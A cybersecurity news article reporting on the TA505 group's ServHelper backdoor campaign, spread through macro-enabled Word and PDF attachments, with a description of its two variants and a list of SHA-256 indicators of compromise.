Tuesday, November 12, 2024
HomeBackdoorTA505 Hacking Group Launching New Malware ServHelper via Weaponized MS Word Documents

TA505 Hacking Group Launching New Malware ServHelper via Weaponized MS Word Documents

Published on

Malware protection

TA505 threat actors currently launching new malware campaign with a backdoor capability that mainly target the financial institutions via MS Word Documents.

TA505 hacking group already had a record of distributing biggest threat campaign  Dridex and widely distributing Locky ransomware that affected millions of computers around the world.

ServHelper backdoor campaign observed in 2018 along with 2 different variants associated to perform 2 different functionality, one is focused on remote desktop functions and another one is downloader variant.

- Advertisement - SIEM as a Service

A downloader variant downloads the new malware called FlawedGrace that contains a fully RAT functionality and this malware first observed in November 2017.

TA505  hacking group targeting various institutions and organizations including banks, retail businesses, and restaurants.

Backdoor Infection process

Initially, ServHelper distributed via email along with weaponized Microsoft word document or other attachments that posed as legitimate content.

A November 2018, campaign contains an attached document with Microsoft “.doc”, “.pub”, or “.wiz”  file format along with macro that force users to enable it, once they enable macro then it starts the infection process.

Since then the same campaign discovered in November 2018 mixture of Microsoft Word attachments with embedded malicious macros, PDF attachments with URLs linking to a fake “Adobe PDF Plugin” webpage linking to the malware.

Once the victims click the link then it immediately communicates with C&C server in order to download additional remote access trojan (RAT) FlawedGrace.

According to Proofpoint research, there are two distinct variants of ServHelper: a “tunnel” variant and a “downloader” variant. The “tunnel” variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). 

Once the malware gain the remote access from the infected machine then it starts to hijack legitimate user accounts or their web browser profiles.

In this case, both variant using the HTTP C&C protocol on port 443 (HTTPS) and, less frequently, port 80 (HTTP) .

Indicators of Compromise (IOCs)

SHA 256

52c72a9de2f6e892f07827add85ad913b0541cd5c8449aadc2722f8eb75e548c – November 9 “Tunnel” campaign ServHelper

eb66ebb95a3dcecae64c61f611a9332fbf460d1b8039d3ab7e4f220104a4bec4 –November 15 “Downloader” campaign attachment

f4b9219f329803dd45afd5646351de456e608dd946830c961ec66c6c25e52cac –December 13 “FlawedGrace” campaign attachment

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Amazon Confirms Employee Data Breach Via Third-party Vendor

Amazon has confirmed that sensitive employee data was exposed due to a breach at...

10 Best DNS Management Tools – 2025

Best DNS Management Tools play a crucial role in efficiently managing domain names and...

Sweet Security Announces Availability of its Cloud Native Detection & Response Platform on the AWS Marketplace

Customers can now easily integrate Sweet’s runtime detection and response platform into their AWS...

Researchers Detailed Credential Abuse Cycle

Cybercriminals exploit leaked credentials, obtained through various means, to compromise systems and data, enabling...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Amazon Confirms Employee Data Breach Via Third-party Vendor

Amazon has confirmed that sensitive employee data was exposed due to a breach at...

Researchers Detailed Credential Abuse Cycle

Cybercriminals exploit leaked credentials, obtained through various means, to compromise systems and data, enabling...

New Android Malware SpyAgent Taking Screenshots Of User’s Devices

SpyAgent, a newly discovered Android malware, leverages OCR technology to extract cryptocurrency recovery phrases...